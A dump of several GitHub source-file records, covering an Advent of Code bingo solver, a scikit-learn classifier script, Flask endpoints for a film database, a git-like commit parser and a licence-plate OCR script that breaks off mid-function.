f.get_val() == num:\n                    assert not f.is_marked(), 'ERROR - repeated draw of number %d' % num\n                    f.set_mark()\n                    return\n        # a drawn number that is not on this board is simply ignored\n\n    def is_winning(self):\n        # check rows\n        for row in self.data:\n            if self.is_winning_row(row):\n                return True\n        # check columns\n        for col in range(len(self.data[0])):\n            # build a virtual row from the column\n            vrow = [ self.data[row][col] for row in range(len(self.data))]\n            if self.is_winning_row(vrow):\n                return True\n        return False\n\n    def is_winning_row(self, row: list):\n        return all([f.is_marked() for f in row])\n\n    def sum_unmarked(self):\n        unmarked = []\n        for row in self.data:\n            u = [f.get_val() for f in row if not f.is_marked()]\n            unmarked.extend(u)\n        return sum(unmarked)\n\n    def score(self, drawn: int):\n        su = self.sum_unmarked()\n        return su * drawn\n\n\nclass Bingo:\n\n    def __init__(self, size=5):\n        self.drawn = None\n        self.boards = []\n        self.size = size\n\n    def print(self):\n        for board in self.boards:\n            board.print()\n\n    def winning_board(self):\n        for board in self.boards:\n            if board.is_winning():\n                return board\n\n    def draw(self, num: int):\n        for board in self.boards:\n            board.draw(num)\n\n    def draw_until_win(self):\n        # process all drawn nums\n        for idx,num in enumerate(self.drawn):\n            if verbose: print(\"# draw: %d # idx: %d #\" % (num,idx))\n            # draw\n            self.draw(num)\n            # optional visualize\n            if verbose: self.print()\n            # check winning\n            board = self.winning_board()\n            # exit if any board has won\n            if board is not None:\n                return num, board\n        return num, None\n\n    def draw_until_win_all(self):\n        not_winning_boards = self.boards[:]\n        # process all drawn nums\n        for idx,num in enumerate(self.drawn):\n            if verbose: print(\"# draw: %d # idx: %d #\" % (num,idx))\n            # draw\n            self.draw(num)\n            # optional visualize\n            if verbose: self.print()\n            # check winning\n            for board in not_winning_boards[:]:\n                if board.is_winning():\n                    not_winning_boards.remove(board)\n            # exit once every board has won\n            if not_winning_boards == []:\n                return num, 
board\n return num, None\n\n def process_input(self, input: list):\n \"\"\" list of strings \"\"\"\n board_idx = 0\n for line in input:\n # drawn numbers\n if self.drawn is None:\n assert line.count(',') > 10, 'ERROR - invalid line with drawn numbers, expecting comma separated values'\n self.drawn = [ int(num) for num in line.split(',') ]\n continue\n # empty lines inc board idx\n if not line:\n board_idx += 1\n board = Board(idx=board_idx, size=self.size)\n self.boards.append(board)\n continue\n # add not empty line to the current board\n board.add_row(line.split())\n\n def task_a(self, input: list):\n \"\"\" task A \"\"\"\n self.process_input(input)\n if verbose: self.print()\n drawn, board = self.draw_until_win()\n assert board is not None, \"ERROR - no winning board found\"\n return board.score(drawn)\n\n def task_b(self, input):\n \"\"\" task B \"\"\"\n self.process_input(input)\n if verbose: self.print()\n drawn, board = self.draw_until_win_all()\n assert board is not None, \"ERROR - all numbers has been drawn, but not all boards are winning\"\n return board.score(drawn)\n\n\ndef testcase_a(sut, input, result):\n \"\"\" testcase verifies if input returns result \"\"\"\n # read default input file\n if input is None:\n data = __file__.replace('.py', '.input')\n with open(data) as f:\n input = [ line.strip() for line in f ]\n #\n print(\"TestCase A using input:\", data if 'data' in vars() else input)\n # read multiline string as input\n if input.count('\\n') > 2:\n input = [ line.strip() for line in input.splitlines() ]\n # optional delete the first empty line\n if len(input[0]) == 0:\n input = input[1:]\n #\n print(\"\\t expected result:\", result)\n r = sut.task_a(input)\n print('\\t got:',r,'\\t','[ OK ]' if r == result else '[ ERR ]')\n print()\n\ndef testcase_b(sut, input, result):\n \"\"\" testcase verifies if input returns result \"\"\"\n # read default input file\n if input is None:\n data = __file__.replace('.py', '.input')\n with open(data) as f:\n input = [ line.strip() for line in f ]\n #\n print(\"TestCase B using input:\", data if 'data' in vars() else input)\n # read multiline string as input\n if input.count('\\n') > 2:\n input = [ line.strip() for line in input.splitlines() ]\n # optional delete the first empty line\n if len(input[0]) == 0:\n input = input[1:]\n #\n print(\"\\t expected result:\", result)\n r = sut.task_b(input)\n print('\\t got:',r,'\\t','[ OK ]' if r == result else '[ ERR ]')\n print()\n\n# ======\n# MAIN\n# ======\n\nprint()\nprint(__motd__, __url__)\nprint()\n\ntestdata = \"\"\" \n7,4,9,5,11,17,23,2,0,14,21,24,10,16,13,6,15,25,12,22,18,20,8,19,3,26,1\n\n22 13 17 11 0\n 8 2 23 4 24\n21 9 14 16 7\n 6 10 3 18 5\n 1 12 20 15 19\n\n 3 15 0 2 22\n 9 18 13 17 5\n19 8 7 25 23\n20 11 10 24 4\n14 21 16 12 6\n\n14 21 17 24 4\n10 16 15 9 19\n18 8 23 26 20\n22 11 13 6 5\n 2 0 12 3 7\n\"\"\"\n\n# ========\n# Task A\n# ========\n\n# test cases\ntestcase_a(Bingo(), testdata, 4512)\n\n# 55770\ntestcase_a(Bingo(), None, 55770)\n\n# ========\n# Task B\n# ========\n\n# test cases\ntestcase_b(Bingo(), testdata, 1924)\n\n# 2980\ntestcase_b(Bingo(), None, 2980)\n","repo_name":"blue-sky-r/Advent-Of-Code","sub_path":"2021/04/u04.py","file_name":"u04.py","file_ext":"py","file_size_in_byte":7322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20401765686","text":"#!/bin/python\nfrom sklearn import tree\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.cross_validation import train_test_split\nfrom 
sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.grid_search import ParameterGrid\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.decomposition import PCA\nfrom sklearn import cross_validation\nimport pandas as pd\nimport numpy as np\nfrom time import time\nimport sys\n\ndef Gridsearch_impl(X,Y,clf,param,cv):\n\n grid_search = GridSearchCV(clf,param,verbose=10,cv=cv,n_jobs=10)\n start = time()\n grid_search.fit(X,Y)\n print(grid_search.grid_scores_)\n\n\ndef PCA_analysis(X, nfeatures):\n pca = PCA(n_components = nfeatures)\n pca.fit(X)\n print(pca.explained_variance_ratio_)\n\n\n\n \ndef importdata():\n trainf = './training_data.txt'\n testf = './testing_data.txt'\n train_data = np.loadtxt(trainf,delimiter='|',skiprows = 1)\n test_data = np.loadtxt(testf,delimiter='|',skiprows = 1)\n X = train_data[:,1:-1]\n Y = train_data[:,-1]\n N,D = X.shape\n for ii in range(0,D):\n if(np.sum(X[:,ii]) == 0.0):\n print(\"%d, feature all 0!\"%ii)\n# for ii in range(0,79):\n# for jj in range(0,ii):\n# if( np.alltrue(X[ii,:] == X[jj,:])):\n # print(\"pair %d, %d, %d, %d\"%(ii,jj,Y[ii],Y[jj]))\n # print(X[ii,:])\n # print(X[jj,:])\n Xtest = test_data[:,1:]\n return X,Y,Xtest\n\ndef cross_val(X,Y):\n depth = 10\n clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=depth))\n param_grid={\n \"n_estimator\":[600]}\n Gridsearch_impl(X,Y,clf,param_grid,cv=5)\n\ndef output_trainE(X,Y,clf):\n Ytrain = clf.predict(X)\n print(Ytrain)\n print(Y)\n print(np.sum(np.abs(Y-Ytrain))/Y.shape[0])\n\ndef main():\n\n X,Y,Xtest = importdata()\n print(Y.shape)\n for i in range(2,50):\n clf = DecisionTreeClassifier(min_samples_split=i)\n #rf = RandomForestClassifier(n_estimators = 300)\n #ab = AdaBoostClassifier(n_estimators = 100)\n ab = GradientBoostingClassifier(n_estimators = 100)\n score = cross_validation.cross_val_score(ab,X,Y,cv=5)\n print(\"average score %f\"%np.mean(score))\n print(\"std %f\"%np.std(score))\n clf.fit(X,Y)\n print(clf.score(X,Y))\n \n #output_trainE(X,Y,clf)\n #PCA_analysis(X,100)\n\n\n# nleaf = 100\n# dt = DecisionTreeClassifier(min_samples_split = nleaf)\n# clf = AdaBoostClassifier(dt,algorithm=\"SAMME\",n_estimators=200,random_state=nleaf)\n# clf.fit(X,Y)\n# Ytest=clf.predict(Xtest)\n#output(Ytest,'adaboost_005_many_{}.csv'.format(nleaf))\n# Yt=clf.predict(X)\n# print(np.sum((np.abs(Y-Yt))))\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kbai/uss","sub_path":"compete.py","file_name":"compete.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26430908414","text":"\"\"\"Endpoints for film\"\"\"\n\nfrom flask import request, jsonify\nfrom pydantic.error_wrappers import ValidationError\nfrom sqlalchemy.exc import DataError\nfrom werkzeug.exceptions import NotFound\nfrom flask_login import current_user\nfrom flask_restx import Resource, fields\n\nfrom app.crud import film\nfrom app.endpoints.todo import todo\nfrom app.domain import create_film, read_films, set_unknown_director_multy, \\\n query_film_multy_sort, query_film_multy_filter, set_unknown_director, get_multi_by_title\nfrom app.models import Film, Role\nfrom loggers import logger\nfrom .namespaces import film_ns\n\nfilm_create_model = film_ns.model('Film Create', {\n 'title': fields.String(description='Film title', example='Peaky Blinders'),\n 'poster': fields.String(description='Link to the 
poster',\n example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n description='Film description',\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(description='Film release date', example='2013-09-12'),\n 'rating': fields.Float(description='Film rating', example='9.5'),\n 'genres': fields.String(description='Film genres', example='1&2&4'),\n 'directors': fields.String(description='Film directors', example='5&45')\n})\n\nfilm_update_model = film_ns.model('Film Update', {\n 'title': fields.String(description='Film title', example='Peaky Blinders'),\n 'poster': fields.String(description='Link to the poster',\n example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n description='Film description',\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(description='Film release date', example='2013-09-12'),\n 'rating': fields.Float(description='Film rating', example='9.5')\n})\n\nfilm_model = film_ns.model('Film', {\n 'title': fields.String(example='Peaky Blinders'),\n 'poster': fields.String(example='https://www.posters.net/Peaky-Blinders-poster'),\n 'description': fields.String(\n example='A gangster family epic set in 1900s England, centering on a gang who '\n 'sew razor blades in the peaks of their caps, and their fierce boss Tommy Shelby.'\n ),\n 'release_date': fields.Date(example='2013-09-12'),\n 'rating': fields.Float(example='9.5'),\n 'genres': fields.String(example=[\n {\n \"genre_name\": \"Action\"\n },\n {\n \"genre_name\": \"Comedy\"\n },\n {\n \"genre_name\": \"Fantasy\"\n }\n ]),\n 'directors': fields.String(example=[\n {\n \"name\": \"Deanna\",\n \"surname\": \"Craig\"\n },\n {\n \"name\": \"Michaela\",\n \"surname\": \"Ruiz\"\n }\n ])\n})\n\n\n@film_ns.route('/', methods=['GET', 'PUT', 'DELETE'], endpoint='film')\n@film_ns.route('', methods=['POST'], endpoint='film_create')\nclass FilmBase(Resource):\n \"\"\"Class for implementing film HTTP requests\"\"\"\n\n @film_ns.doc(\n model=film_model,\n params={'film_id': 'An ID'},\n responses={200: 'Success', 404: 'Not Found'}\n )\n def get(self, film_id):\n \"\"\"Get one record from the film table\"\"\"\n film_rec = todo.get(record_id=film_id, crud=film, t_name='film')\n return set_unknown_director(film_rec)\n\n @film_ns.response(201, 'Record created successfully', model=film_model)\n @film_ns.response(400, 'Validation Error')\n @film_ns.response(401, 'Unauthorized')\n @film_ns.doc(body=film_create_model)\n def post(self):\n \"\"\"Create new record in the film table\"\"\"\n if not current_user.is_authenticated:\n logger.error('An attempt to add a movie by an unauthenticated user.')\n film_ns.abort(401, 'You need to be authenticated to add a film')\n directors_id = request.json.get('directors')\n genres_id = request.json.get('genres')\n values = {\n 'title': request.json.get('title'),\n 'poster': request.json.get('poster'),\n 'description': request.json.get('description'),\n 'release_date': request.json.get('release_date'),\n 'rating': request.json.get('rating'),\n 'user_id': current_user.user_id\n }\n\n if values['description'] == '':\n values['description'] = 'Film has no description.'\n\n try:\n film_record = create_film(film, values=values,\n 
directors_id=directors_id,\n genres_id=genres_id).dict()\n logger.info('Created new film with such fields\\n%s.', str(values))\n return set_unknown_director(film_record), 201\n\n except (ValidationError, DataError) as error:\n logger.error(\"Incorrect data entered. \"\n \"The record in film table could not be created. %s\", error)\n film_ns.abort(400, message=\"Incorrect data entered. The record could not be created.\")\n return None\n\n except ValueError:\n logger.error(\"Attempt to create film with title that already exist.\")\n film_ns.abort(400, \"Film with such title already exist.\")\n return None\n\n def del_put_access(self, film_id: int, action: str):\n \"\"\"Check access to put and post methods\"\"\"\n if not current_user.is_authenticated:\n logger.error('An attempt to %s a movie by an unauthenticated user.', action)\n film_ns.abort(401, f'You need to be authenticated to {action} a film.')\n db_film = Film.query.get(film_id)\n admin = Role.query.filter_by(name='admin').first()\n if db_film.user_id != current_user.user_id and current_user.role_id != admin.role_id:\n logger.error(\"Not the user who added the film and not an administrator \"\n \"try to %s a film. Access denied.\", action)\n film_ns.abort(403, \"Only the user who added the film or an administrator \"\n \"can make changes to a film. Access denied.\")\n return True\n\n @film_ns.doc(\n model=film_model,\n body=film_update_model,\n params={'film_id': 'An ID'},\n responses={200: 'Record updated successfully',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 404: 'Not Found'}\n )\n def put(self, film_id):\n \"\"\"Update a record in the film table\"\"\"\n try:\n access = self.del_put_access(film_id=film_id, action='update')\n if access is True:\n film_rec = todo.update(record_id=film_id, crud=film, t_name='film')\n return set_unknown_director(film_rec)\n return access\n\n except AttributeError:\n logger.error('Attempt to update record with id %d in film table, '\n 'but record does not exist.', film_id)\n film_ns.abort(404, message=f\"Record with id {film_id} doesn't exist.\")\n return None\n\n except ValueError:\n logger.error(\"Attempt to update film title to the one that is already in the database.\")\n film_ns.abort(400, \"Film with such title already exist.\")\n return None\n\n @film_ns.doc(\n params={'film_id': 'An ID'},\n responses={204: 'Record deleted successfully',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 404: 'Not Found'}\n )\n def delete(self, film_id):\n \"\"\"Delete a record from the film table\"\"\"\n try:\n access = self.del_put_access(film_id=film_id, action='delete')\n if access is True:\n return todo.delete(record_id=film_id, crud=film, t_name='film')\n return access\n except (AttributeError, ValidationError):\n logger.error('Attempt to delete record with id %d in film table, '\n 'but record does not exist.', film_id)\n film_ns.abort(404, message=f\"Record with id {film_id} doesn't exist.\")\n return None\n\n\n@film_ns.route('/all/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_default')\n@film_ns.route('/all//', methods=['GET'], endpoint='films')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page'})\nclass Films(Resource):\n \"\"\"Class for implementing films get multy request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page):\n \"\"\"Get all records from the film table\"\"\"\n try:\n films = read_films(crud=film, page=page, per_page=per_page).dict()\n logger.info('Returned the %d page of film table '\n 
'records paginated with %d records per page.', page, per_page)\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records in film table.\")\n film_ns.abort(404, message=\"No more records in film table.\")\n return None\n\n\n@film_ns.route('//', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_title_default')\n@film_ns.route('///', methods=['GET'],\n endpoint='films_title')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'title': \"Part of the film's title\"})\nclass FilmsTitle(Resource):\n \"\"\"Class for implementing films get multy by title request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page, title):\n \"\"\"Get all records from the film table by partial coincidence of title\"\"\"\n try:\n films = get_multi_by_title(film_crud=film, page=page,\n per_page=per_page, title=title).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'by partial coincidence of the name with \"%s\"',\n page, per_page, title)\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n\n\n@film_ns.route('/filter/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_filter_default')\n@film_ns.route('/filter//', methods=['GET'], endpoint='films_filter')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'release_date': {'description': 'Release year range', 'example': '2002-2020'},\n 'directors': {'description': 'Names and surnames of directors',\n 'example': 'Ricky_Perkins&Mark_Hunter — if several directors or'\n ' Ricky_Perkins — if only one director'},\n 'genres': {'description': 'Genre names',\n 'example': 'Action&Comedy — if several genres or '\n 'Comedy — if only one genre'}})\nclass FilmsFiltered(Resource):\n \"\"\"Class for implementing films get multy filtered request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page, per_page):\n \"\"\"Get all records from the film table filtered by genres, release date and directors\"\"\"\n data = [request.args.get('release_date', default=None),\n request.args.get('directors', default=None),\n request.args.get('genres', default=None)]\n try:\n films = query_film_multy_filter(film_crud=film, values=data,\n page=page, per_page=per_page).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'filtered by \"%s\"', page, per_page, str(data))\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n\n\n@film_ns.route('/sort/', methods=['GET'],\n defaults={'per_page': 10}, endpoint='films_sort_default')\n@film_ns.route('/sort//', methods=['GET'], endpoint='films_sort')\n@film_ns.doc(params={'page': 'Page number', 'per_page': 'Number of entries per page',\n 'release_date': {'description': 'Sort order by release date',\n 'example': 'asc — for ascending order, '\n 'desc — for descending'},\n 'rating': {'description': 'Sort order by rating',\n 'example': 'asc — for ascending order, desc — 
for descending'}})\nclass FilmsSorted(Resource):\n \"\"\"Class for implementing films get multy sorted request\"\"\"\n @film_ns.doc(responses={200: 'Success', 404: 'Not Found'})\n def get(self, page: int, per_page: int):\n \"\"\"Get all records from the film table sorted by release date and rating\"\"\"\n order = [request.args.get('release_date', default=None),\n request.args.get('rating', default=None)]\n try:\n films = query_film_multy_sort(film_crud=film, page=page,\n per_page=per_page, order=order).dict()\n logger.info('Returned the %d page of film table '\n 'records paginated with %d records per page '\n 'sorted by %s', page, per_page, str(order))\n return jsonify(set_unknown_director_multy(films)['__root__'])\n except NotFound:\n logger.warning(\"No more records corresponding to the request in film table.\")\n film_ns.abort(404, message=\"No more records corresponding \"\n \"to the request in film table.\")\n return None\n","repo_name":"AlisaZobova/final_project","sub_path":"app/endpoints/film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":14821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"70726621924","text":"import os\nfrom .JitRepository import JitRepository\nimport collections\n\n# Utility class\nclass Util:\n\n\tdef find_repo(self,path = \"\", required= True):\n\t\t\"\"\" function to find a repo in a parent directory\"\"\"\n\t\tpath = os.path.realpath(path)\n\t\tif os.path.isdir(os.path.join(path, \".jit\")):\n\t\t\treturn JitRepository(path)\n\t\t\n\t\t# recurse upwards until we reach the filesystem root\n\t\tparent = os.path.realpath(os.path.join(path, \"..\"))\n\t\tif parent == path:\n\t\t\tif required:\n\t\t\t\traise Exception(\"No git directory\")\n\t\t\telse:\n\t\t\t\treturn None\n\t\treturn self.find_repo(parent, required)\n\t\n\tdef kvlm_parse(self,raw, start=0, dct= None):\n\t\tif not dct:\n\t\t\tdct = collections.OrderedDict()\n\n\t\t\n\t\t# we search for the next space and next newline\n\t\tspc = raw.find(b' ', start)\n\t\tnl = raw.find(b'\\n', start)\n\n\t\t#if space appears before newline, we have a keyword\n\n\t\t#base case\n\t\t'''\n\t\tif newline appears first or there's no space at all (in which case find returns -1), we assume a blank line.\n\t\tA blank line means the remainder of the data is the message\n\t\t'''\n\n\t\tif spc < 0 or nl < spc:\n\t\t\tassert(nl == start)\n\t\t\tdct[b''] = raw[start+1:]\n\t\t\treturn dct\n\t\t\n\t\t# recursive case\n\t\t# we read a key value pair and recurse for the next\n\t\tkey = raw[start:spc]\n\n\t\t# find the end of the value. Continuation lines begin with a space, so we loop until we find a newline not followed by a space\n\n\t\tend = start\n\n\t\twhile True:\n\t\t\tend = raw.find(b'\\n', end+1)\n\t\t\tif raw[end+1] != ord(' '): break\n\t\t\n\t\t# grab the value\n\t\t# also, drop the leading space on continuation lines\n\t\tvalue = raw[spc+1:end].replace(b'\\n ', b'\\n')\n\n\n\t\t# don't overwrite existing data contents\n\n\t\tif key in dct:\n\t\t\tif type(dct[key]) == list:\n\t\t\t\tdct[key].append(value)\n\t\t\telse:\n\t\t\t\tdct[key] = [dct[key], value]\n\t\telse:\n\t\t\tdct[key] = value\n\t\treturn self.kvlm_parse(raw, start= end+1, dct= dct)\n\t\n\n\tdef kvlm_serialize(self, kvlm):\n\t\tret = b''\n\n\t\t# output fields\n\t\tfor k in kvlm.keys():\n\t\t\t#skip the message itself\n\n\t\t\tif k == b'': continue\n\t\t\tval = kvlm[k]\n\n\t\t\tif type(val) != list:\n\t\t\t\tval = [val]\n\t\t\tfor v in val:\n\t\t\t\tret += k + b' ' + (v.replace(b'\\n', b'\\n ')) + b'\\n'\n\n\t\t# append the message itself after a blank line\n\t\tret += b'\\n' + kvlm[b'']\n\t\treturn ret\n\n\n","repo_name":"ashokgaire/jit","sub_path":"engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
+{"seq_id":"5344041459","text":"\n# import the necessary packages\nfrom PIL import Image\nimport pytesseract\nimport argparse\nimport cv2\nimport os\nimport time\nimport numpy as np\nimport pandas as pd\nfrom skimage.segmentation import clear_border\n\n\n# number extracting function with some extra preprocessing\ndef ocr_extractor(folder_path='/home/pooja/yolov5_tapansir/test_car_videos'):\n    folder_path = folder_path\n    images = os.listdir(folder_path)\n    result = {'images':[],'resolution':[] , 'text_extracted':[], 'duration_in_microseconds':[], 'Actual_text':[], 'remarks':[]}\n    for org_image in images:\n        croped_image = folder_path+'/'+org_image\n\n        # print(croped_image)\n        start_time = time.time()\n        image = cv2.imread(croped_image)\n        resize_test_license_plate = cv2.resize(image, None, fx = 1.5, fy = 1.5, interpolation = cv2.INTER_CUBIC)\n        grayscale_resize_test_license_plate = cv2.cvtColor(resize_test_license_plate, cv2.COLOR_BGR2GRAY)\n\n        # rectKern = cv2.getStructuringElement(cv2.MORPH_RECT, (15, 5))\n        # blackhat = cv2.morphologyEx(grayscale_resize_test_license_plate, cv2.MORPH_BLACKHAT, rectKern)\n        # unblur = cv2.GaussianBlur(grayscale_resize_test_license_plate, (1, 1), 0)\n\n        unblur = cv2.bilateralFilter(grayscale_resize_test_license_plate,9,15,75)\n        squareKern = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 2))\n        \n\n        se=cv2.getStructuringElement(cv2.MORPH_RECT , (8,8))\n        bg=cv2.morphologyEx(grayscale_resize_test_license_plate, cv2.MORPH_DILATE, se)\n        out_gray=cv2.divide(grayscale_resize_test_license_plate, bg, scale=255)\n\n        out_binary=cv2.threshold(out_gray, 100, 255, cv2.THRESH_OTSU )[1] \n        kernel = np.ones((1, 1),np.uint8)\n        erode = cv2.erode(out_binary, kernel, iterations = 1)\n        light = cv2.morphologyEx(out_gray, cv2.MORPH_OPEN, squareKern,iterations=2)\n        image_sharp = clear_border(light)\n        # blur = cv2.medianBlur(image_sharp,1)\n        # image_sharp1 = cv2.threshold(image_sharp, 110, 255, cv2.THRESH_OTSU )[1] \n        # image_sharp1 = cv2.adaptiveThreshold(grayscale_resize_test_license_plate, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 9)\n        image_sharp1 = cv2.adaptiveThreshold(unblur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 9)\n\n\n        # kernel = np.array([[0, -1, 0],\n        #                    [-1, 5,-1],\n        #                    [0, -1, 0]])\n        # image_sharp = 
cv2.filter2D(src=light, ddepth=-1, kernel=kernel)\n\n #adaptive thresholding applied\n\n adaptive_threshold = cv2.adaptiveThreshold(grayscale_resize_test_license_plate, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 101, 3)\n\n\n # gradX = cv2.Sobel(blackhat, ddepth=cv2.CV_32F,dx=1, dy=0, ksize=-1)\n # gradX = np.absolute(gradX)\n # (minVal, maxVal) = (np.min(gradX), np.max(gradX))\n # gradX = 255 * ((gradX - minVal) / (maxVal - minVal))\n # gradX = gradX.astype(\"uint8\")\n # gradX = cv2.GaussianBlur(gradX, (5, 5), 0)\n # gradX = cv2.morphologyEx(gradX, cv2.MORPH_CLOSE, rectKern)\n # thresh = cv2.threshold(gradX, 0, 255,cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n # thresh = cv2.erode(thresh, None, iterations=2)\n # thresh = cv2.dilate(thresh, None, iterations=2)\n # thresh = cv2.bitwise_and(thresh, thresh, mask=light)\n # thresh = cv2.dilate(thresh, None, iterations=2)\n # thresh = cv2.erode(thresh, None, iterations=1)\n # roi = cv2.threshold(thresh, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n # blk = cv2.threshold(blackhat, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n\t\t\n\n gaussian_blur_license_plate = cv2.GaussianBlur(image_sharp1, (5, 5), 1)\n gaussian_blur_license_plate_gradx = cv2.GaussianBlur(out_binary, (7,7 ), 0)\n gaussian_blur_license_plate_blackhat = cv2.GaussianBlur(adaptive_threshold, (5, 5), 1)\n \n config ='--oem 1 -l eng --psm 12 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'\n\n new_predicted_result_GWT2180 = pytesseract.image_to_string(gaussian_blur_license_plate, lang ='eng', config = config)\n new_predicted_result_GWT2180_gradx = pytesseract.image_to_string(gaussian_blur_license_plate_gradx, lang ='eng', config = config)\n new_predicted_result_GWT2180_blackhat = pytesseract.image_to_string(gaussian_blur_license_plate_blackhat, lang ='eng',config = config)\n\n filter_new_predicted_result_GWT2180 = \"\".join(new_predicted_result_GWT2180.split(',')).replace(\":\", \"\").replace(\"-\", \"\")\n\n # gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n # text = pytesseract.image_to_string(gray)\n print(f\"image : {org_image} \\n predicted {new_predicted_result_GWT2180}\\n filtered: {filter_new_predicted_result_GWT2180}\\nnew_predicted_result_GWT2180_blackhat: {new_predicted_result_GWT2180_blackhat} \\nnew_predicted_result_GWT2180_gradx:{new_predicted_result_GWT2180_gradx}\")\n\n # cv2.imshow(\"resize_test_license_plate\", resize_test_license_plate)\n # cv2.imshow(\"grayscale_resize_test_license_plate\", grayscale_resize_test_license_plate)\n # cv2.imshow(\"out_binary\", out_binary)\n # cv2.imshow(\"unblur\", unblur)\n\n # cv2.imshow(\"light\", image_sharp1) \n # er, dil = remove_noice(image)\n # cv2.imshow(\"dil\", dil)\n # cv2.imshow(\"blk\", blk)\n # cv2.imshow(\"gaussian_blur_license_plate\", gaussian_blur_license_plate)\n # cv2.imshow(\"gaussian_blur_license_plate_blackhat\", gaussian_blur_license_plate_blackhat)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n #show threshed image\n # cv2.imshow(f\"{text}\", image)\n # cv2.imshow(\"thresh\", gray)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n stop_time = time.time()\n duration = stop_time-start_time\n # l = [dict(zip([1],[x])) for x in range(1,2)]\n # breakpoint()\n # print(f\"text: {text}, duration: {duration}\")\n result['images']+=[croped_image.split('/')[-1]]\n result['resolution']+=[image.shape[:2]]\n result['text_extracted']+=[filter_new_predicted_result_GWT2180]\n # 
result['text_extracted_out_bin']+=[new_predicted_result_GWT2180_gradx]\n result['duration_in_microseconds']+=[duration]\n result['Actual_text']+=['']\n result['remarks']+=['']\n return result\n\n \n\n\n\n\n\n# number plate extraction with single images\ndef tess_num_detect():\n im_path = '/home/pooja/yolov5_tapansir/runs/detect/exp87/crops/number_plate/5cbd7465-ad12-4e6b-8eaf-d7056c3852f8___New-2018-Maruti-Suzuki-Swift-radiator-grille-600x398.jpg.jpg'\n start_time = time.time()\n image = cv2.imread(im_path)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n text = pytesseract.image_to_string(gray)\n stop_time = time.time()\n duration = stop_time-start_time\n breakpoint()\n print(f\"text: {text}, duration: {duration}\")\n # return text, duration\n\n\n# number plate extraction with multiple images\n\ndef tess_num_detect_with_folder(folder_path='/home/pooja/test_result_himani'):\n folder_path = folder_path\n images = os.listdir(folder_path)\n result = {'images':[],'resolution':[] , 'text_extracted_processed':[], 'duration_in_microseconds':[], 'Actual_text':[], 'remarks':[]}\n for org_image in images:\n croped_image = folder_path+'/'+org_image\n # print(croped_image)\n start_time = time.time()\n image = cv2.imread(croped_image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n text = pytesseract.image_to_string(gray, config ='--oem 1 -l eng --psm 8 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')\n\n # show threshed image\n \n # cv2.imshow(f\"{text}\", image)\n # cv2.imshow(\"thresh\", gray)\n # cv2.waitKey(0)\n # 